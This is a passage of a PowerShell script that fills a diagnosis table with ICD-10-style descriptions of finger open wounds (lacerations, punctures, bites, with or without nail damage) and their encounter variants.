without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right ring finger without damage to nail","Laceration without foreign body of right ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right ring finger without damage to nail","Laceration without foreign body of right ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right ring finger without damage to nail","Laceration without foreign body of right ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left ring finger without damage to nail","Laceration without foreign body of left ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left ring finger without damage to nail","Laceration without foreign body of left ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left ring finger without damage to nail","Laceration without foreign body of left ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right little finger without damage to nail","Laceration without foreign body of right little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right little finger without damage to nail","Laceration without foreign body of right little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right little finger without damage to nail","Laceration without foreign body of right little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left little finger without damage to nail","Laceration without foreign body of left little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left little finger without damage to nail","Laceration without foreign body of left little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left little finger without damage to nail","Laceration without foreign body of left little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of other finger without damage to nail","Laceration without foreign body of other finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of other finger without damage to nail","Laceration without foreign body of other finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of other finger without damage to nail","Laceration without foreign body of other finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified finger without damage to nail","Laceration without foreign body of unspecified finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified finger without damage to nail","Laceration without foreign body of unspecified finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified finger without damage to nail","Laceration without foreign body of unspecified finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right index finger without damage to nail","Laceration with foreign body of right index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right index finger without damage to nail","Laceration with foreign body of right index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right index finger without damage to nail","Laceration with foreign body of right index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left index finger without damage to nail","Laceration with foreign body of left index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left index finger without damage to nail","Laceration with foreign body of left index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left index finger without damage to nail","Laceration with foreign body of left index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right middle finger without damage to nail","Laceration with foreign body of right middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right middle finger without damage to nail","Laceration with foreign body of right middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right middle finger without damage to nail","Laceration with foreign body of right middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left middle finger without damage to nail","Laceration with foreign body of left middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left middle finger without damage to nail","Laceration with foreign body of left middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left middle finger without damage to nail","Laceration with foreign body of left middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right ring finger without damage to nail","Laceration with foreign body of right ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right ring finger without damage to nail","Laceration with foreign body of right ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right ring finger without damage to nail","Laceration with foreign body of right ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left ring finger without damage to nail","Laceration with foreign body of left ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left ring finger without damage to nail","Laceration with foreign body of left ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left ring finger without damage to nail","Laceration with foreign body of left ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right little finger without damage to nail","Laceration with foreign body of right little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right little finger without damage to nail","Laceration with foreign body of right little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right little finger without damage to nail","Laceration with foreign body of right little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left little finger without damage to nail","Laceration with foreign body of left little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left little finger without damage to nail","Laceration with foreign body of left little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left little finger without damage to nail","Laceration with foreign body of left little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of other finger without damage to nail","Laceration with foreign body of other finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of other finger without damage to nail","Laceration with foreign body of other finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of other finger without damage to nail","Laceration with foreign body of other finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified finger without damage to nail","Laceration with foreign body of unspecified finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified finger without damage to nail","Laceration with foreign body of unspecified finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified finger without damage to nail","Laceration with foreign body of unspecified finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right index finger without damage to nail","Puncture wound without foreign body of right index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right index finger without damage to nail","Puncture wound without foreign body of right index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right index finger without damage to nail","Puncture wound without foreign body of right index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left index finger without damage to nail","Puncture wound without foreign body of left index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left index finger without damage to nail","Puncture wound without foreign body of left index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left index finger without damage to nail","Puncture wound without foreign body of left index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right middle finger without damage to nail","Puncture wound without foreign body of right middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right middle finger without damage to nail","Puncture wound without foreign body of right middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right middle finger without damage to nail","Puncture wound without foreign body of right middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left middle finger without damage to nail","Puncture wound without foreign body of left middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left middle finger without damage to nail","Puncture wound without foreign body of left middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left middle finger without damage to nail","Puncture wound without foreign body of left middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right ring finger without damage to nail","Puncture wound without foreign body of right ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right ring finger without damage to nail","Puncture wound without foreign body of right ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right ring finger without damage to nail","Puncture wound without foreign body of right ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left ring finger without damage to nail","Puncture wound without foreign body of left ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left ring finger without damage to nail","Puncture wound without foreign body of left ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left ring finger without damage to nail","Puncture wound without foreign body of left ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right little finger without damage to nail","Puncture wound without foreign body of right little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right little finger without damage to nail","Puncture wound without foreign body of right little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right little finger without damage to nail","Puncture wound without foreign body of right little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left little finger without damage to nail","Puncture wound without foreign body of left little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left little finger without damage to nail","Puncture wound without foreign body of left little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left little finger without damage to nail","Puncture wound without foreign body of left little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of other finger without damage to nail","Puncture wound without foreign body of other finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of other finger without damage to nail","Puncture wound without foreign body of other finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of other finger without damage to nail","Puncture wound without foreign body of other finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified finger without damage to nail","Puncture wound without foreign body of unspecified finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified finger without damage to nail","Puncture wound without foreign body of unspecified finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified finger without damage to nail","Puncture wound without foreign body of unspecified finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right index finger without damage to nail","Puncture wound with foreign body of right index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right index finger without damage to nail","Puncture wound with foreign body of right index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right index finger without damage to nail","Puncture wound with foreign body of right index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left index finger without damage to nail","Puncture wound with foreign body of left index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left index finger without damage to nail","Puncture wound with foreign body of left index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left index finger without damage to nail","Puncture wound with foreign body of left index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right middle finger without damage to nail","Puncture wound with foreign body of right middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right middle finger without damage to nail","Puncture wound with foreign body of right middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right middle finger without damage to nail","Puncture wound with foreign body of right middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left middle finger without damage to nail","Puncture wound with foreign body of left middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left middle finger without damage to nail","Puncture wound with foreign body of left middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left middle finger without damage to nail","Puncture wound with foreign body of left middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right ring finger without damage to nail","Puncture wound with foreign body of right ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right ring finger without damage to nail","Puncture wound with foreign body of right ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right ring finger without damage to nail","Puncture wound with foreign body of right ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left ring finger without damage to nail","Puncture wound with foreign body of left ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left ring finger without damage to nail","Puncture wound with foreign body of left ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left ring finger without damage to nail","Puncture wound with foreign body of left ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right little finger without damage to nail","Puncture wound with foreign body of right little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right little finger without damage to nail","Puncture wound with foreign body of right little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right little finger without damage to nail","Puncture wound with foreign body of right little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left little finger without damage to nail","Puncture wound with foreign body of left little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left little finger without damage to nail","Puncture wound with foreign body of left little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left little finger without damage to nail","Puncture wound with foreign body of left little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of other finger without damage to nail","Puncture wound with foreign body of other finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of other finger without damage to nail","Puncture wound with foreign body of other finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of other finger without damage to nail","Puncture wound with foreign body of other finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified finger without damage to nail","Puncture wound with foreign body of unspecified finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified finger without damage to nail","Puncture wound with foreign body of unspecified finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified finger without damage to nail","Puncture wound with foreign body of unspecified finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right index finger without damage to nail","Open bite of right index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right index finger without damage to nail","Open bite of right index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right index finger without damage to nail","Open bite of right index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left index finger without damage to nail","Open bite of left index finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left index finger without damage to nail","Open bite of left index finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left index finger without damage to nail","Open bite of left index finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right middle finger without damage to nail","Open bite of right middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right middle finger without damage to nail","Open bite of right middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right middle finger without damage to nail","Open bite of right middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left middle finger without damage to nail","Open bite of left middle finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left middle finger without damage to nail","Open bite of left middle finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left middle finger without damage to nail","Open bite of left middle finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right ring finger without damage to nail","Open bite of right ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right ring finger without damage to nail","Open bite of right ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right ring finger without damage to nail","Open bite of right ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left ring finger without damage to nail","Open bite of left ring finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left ring finger without damage to nail","Open bite of left ring finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left ring finger without damage to nail","Open bite of left ring finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right little finger without damage to nail","Open bite of right little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right little finger without damage to nail","Open bite of right little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right little finger without damage to nail","Open bite of right little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left little finger without damage to nail","Open bite of left little finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left little finger without damage to nail","Open bite of left little finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left little finger without damage to nail","Open bite of left little finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of other finger without damage to nail","Open bite of other finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of other finger without damage to nail","Open bite of other finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of other finger without damage to nail","Open bite of other finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified finger without damage to nail","Open bite of unspecified finger without damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified finger without damage to nail","Open bite of unspecified finger without damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified finger without damage to nail","Open bite of unspecified finger without damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right index finger with damage to nail","Unspecified open wound of right index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right index finger with damage to nail","Unspecified open wound of right index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right index finger with damage to nail","Unspecified open wound of right index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left index finger with damage to nail","Unspecified open wound of left index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left index finger with damage to nail","Unspecified open wound of left index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left index finger with damage to nail","Unspecified open wound of left index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right middle finger with damage to nail","Unspecified open wound of right middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right middle finger with damage to nail","Unspecified open wound of right middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right middle finger with damage to nail","Unspecified open wound of right middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left middle finger with damage to nail","Unspecified open wound of left middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left middle finger with damage to nail","Unspecified open wound of left middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left middle finger with damage to nail","Unspecified open wound of left middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right ring finger with damage to nail","Unspecified open wound of right ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right ring finger with damage to nail","Unspecified open wound of right ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right ring finger with damage to nail","Unspecified open wound of right ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left ring finger with damage to nail","Unspecified open wound of left ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left ring finger with damage to nail","Unspecified open wound of left ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left ring finger with damage to nail","Unspecified open wound of left ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right little finger with damage to nail","Unspecified open wound of right little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right little finger with damage to nail","Unspecified open wound of right little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right little finger with damage to nail","Unspecified open wound of right little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left little finger with damage to nail","Unspecified open wound of left little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left little finger with damage to nail","Unspecified open wound of left little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left little finger with damage to nail","Unspecified open wound of left little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of other finger with damage to nail","Unspecified open wound of other finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of other finger with damage to nail","Unspecified open wound of other finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of other finger with damage to nail","Unspecified open wound of other finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified finger with damage to nail","Unspecified open wound of unspecified finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified finger with damage to nail","Unspecified open wound of unspecified finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified finger with damage to nail","Unspecified open wound of unspecified finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right index finger with damage to nail","Laceration without foreign body of right index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right index finger with damage to nail","Laceration without foreign body of right index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right index finger with damage to nail","Laceration without foreign body of right index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left index finger with damage to nail","Laceration without foreign body of left index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left index finger with damage to nail","Laceration without foreign body of left index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left index finger with damage to nail","Laceration without foreign body of left index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right middle finger with damage to nail","Laceration without foreign body of right middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right middle finger with damage to nail","Laceration without foreign body of right middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right middle finger with damage to nail","Laceration without foreign body of right middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left middle finger with damage to nail","Laceration without foreign body of left middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left middle finger with damage to nail","Laceration without foreign body of left middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left middle finger with damage to nail","Laceration without foreign body of left middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right ring finger with damage to nail","Laceration without foreign body of right ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right ring finger with damage to nail","Laceration without foreign body of right ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right ring finger with damage to nail","Laceration without foreign body of right ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left ring finger with damage to nail","Laceration without foreign body of left ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left ring finger with damage to nail","Laceration without foreign body of left ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left ring finger with damage to nail","Laceration without foreign body of left ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right little finger with damage to nail","Laceration without foreign body of right little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right little finger with damage to nail","Laceration without foreign body of right little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right little finger with damage to nail","Laceration without foreign body of right little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left little finger with damage to nail","Laceration without foreign body of left little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left little finger with damage to nail","Laceration without foreign body of left little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left little finger with damage to nail","Laceration without foreign body of left little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of other finger with damage to nail","Laceration without foreign body of other finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of other finger with damage to nail","Laceration without foreign body of other finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of other finger with damage to nail","Laceration without foreign body of other finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified finger with damage to nail","Laceration without foreign body of unspecified finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified finger with damage to nail","Laceration without foreign body of unspecified finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified finger with damage to nail","Laceration without foreign body of unspecified finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right index finger with damage to nail","Laceration with foreign body of right index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right index finger with damage to nail","Laceration with foreign body of right index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right index finger with damage to nail","Laceration with foreign body of right index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left index finger with damage to nail","Laceration with foreign body of left index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left index finger with damage to nail","Laceration with foreign body of left index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left index finger with damage to nail","Laceration with foreign body of left index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right middle finger with damage to nail","Laceration with foreign body of right middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right middle finger with damage to nail","Laceration with foreign body of right middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right middle finger with damage to nail","Laceration with foreign body of right middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left middle finger with damage to nail","Laceration with foreign body of left middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left middle finger with damage to nail","Laceration with foreign body of left middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left middle finger with damage to nail","Laceration with foreign body of left middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right ring finger with damage to nail","Laceration with foreign body of right ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right ring finger with damage to nail","Laceration with foreign body of right ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right ring finger with damage to nail","Laceration with foreign body of right ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left ring finger with damage to nail","Laceration with foreign body of left ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left ring finger with damage to nail","Laceration with foreign body of left ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left ring finger with damage to nail","Laceration with foreign body of left ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right little finger with damage to nail","Laceration with foreign body of right little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right little finger with damage to nail","Laceration with foreign body of right little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right little finger with damage to nail","Laceration with foreign body of right little finger with damage to 